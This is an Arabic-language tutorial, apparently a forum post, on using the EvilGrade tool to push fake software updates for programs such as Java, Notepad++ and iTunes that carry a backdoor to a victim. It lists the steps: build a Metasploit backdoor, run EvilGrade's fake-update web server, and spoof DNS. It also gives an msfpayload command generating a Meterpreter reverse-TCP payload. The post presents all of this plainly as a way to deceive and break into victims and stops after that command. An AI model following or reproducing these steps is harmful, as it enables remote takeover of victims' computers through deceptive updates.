طيب في البداية لازم نعطي خلفية عن الموضوع وتوضيح الفكر ة
EvilGrade سكربت يقوم بعمل ترقية وهمية تحتوي على باك دور يتم حقنه بأحد البرامج التي تطلب تحديث مثل notepad++ أو j a v a
الهدف منه: تسهيل عملية الاختراق بخداع الضحية بوجود تحديث لأحد البرامج المستخدمه من قبله كما يوجد خيار آخر لعمل هجوم MITM
ايضا Evilgrade الذي سيقوم بتشغيل w e b Server يحتوي على تحديث مزيّف لبرنامج معين يعني ان صح التعبير تخدع هذه
طيب البرامج التى يمكن ان تنطلي الحيلة عليها
J A V A sun
winzip
winamp
itunes
speedbit
openoffice
linkedin
osx
notepadplus
dap
طيب الان نشرح مكا***ية العمل :
1-قوم بتكوين Backdoor باستخدام مشروع ميتاسبلويت بالخيارات التي تناسبنا.
2-استخدام مشروع Evilgrade الذي سيقوم بتشغيل w e b Server يحتوي على تحديث مزيّف لبرنامج j a v a
3-عمل DNS Spoof
الان نذهـب للموقع هذا لتحميل EvilGrade
كود PHP:
http://www.infobyte.com.ar/
هذه واجه الموقع زي ماتشفون
كود PHP:
./msfpayload windows/meterpreter/reverse_tcp LHOST= your IP LPORT= 4444 x > امتداد الحفظ